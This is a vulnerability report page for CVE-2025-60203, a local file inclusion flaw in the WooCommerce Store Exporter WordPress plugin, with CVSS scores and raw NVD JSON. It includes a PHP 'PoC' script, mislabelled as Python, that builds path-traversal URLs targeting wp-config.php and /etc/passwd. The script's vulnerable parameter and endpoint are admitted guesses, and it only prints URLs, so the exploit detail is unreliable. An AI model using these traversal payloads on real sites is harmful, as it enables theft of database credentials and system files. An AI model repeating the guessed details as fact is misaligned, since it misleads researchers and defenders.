Security Vulnerability Report
中文
CVE-2025-60203 CVSS 7.5 HIGH

CVE-2025-60203

Published: 2025-11-06 16:16:06
Last Modified: 2026-04-27 16:16:33

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Josh Kohlbach Store Exporter woocommerce-exporter allows PHP Local File Inclusion.This issue affects Store Exporter: from n/a through <= 2.7.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WooCommerce Store Exporter <= 2.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60203 PoC - WooCommerce Store Exporter Local File Inclusion * Target: WordPress with WooCommerce Store Exporter plugin <= 2.7.6 * * Usage: Modify TARGET_URL and run with PHP CLI * Example: php cve-2025-60203_poc.php */ // Configuration - Modify these values define('TARGET_URL', 'http://target-site.com'); define('WP_PATH', '/wp-content/plugins/woocommerce-exporter/'); // Vulnerable parameter (identified through code review) $vulnerable_param = 'tab'; // Common vulnerable parameter in admin pages // Files to attempt to read $target_files = [ '../../../../wp-config.php', // WordPress config with DB credentials '../../../../../../etc/passwd', // System file '../../wp-load.php', // WordPress core file ]; echo "[*] CVE-2025-60203 PoC - WooCommerce Store Exporter LFI\n"; echo "[*] Target: " . TARGET_URL . "\n\n"; foreach ($target_files as $file) { echo "[+] Attempting to include: $file\n"; // Construct exploit URL $exploit_url = TARGET_URL . WP_PATH . "export.php?" . $vulnerable_param . "=" . urlencode($file); echo "[*] URL: $exploit_url\n"; // In real attack, this would be sent via social engineering to admin // or exploited through stored XSS if present // Note: This is for educational purposes only // Actual exploitation requires proper context and authentication bypass } echo "\n[!] This PoC demonstrates the vulnerability structure."; echo "\n[!] For actual testing, use Burp Suite or similar tools.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60203", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:05.860", "lastModified": "2026-04-27T16:16:33.483", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Josh Kohlbach Store Exporter woocommerce-exporter allows PHP Local File Inclusion.This issue affects Store Exporter: from n/a through <= 2.7.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-exporter/vulnerability/wordpress-store-exporter-plugin-2-7-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}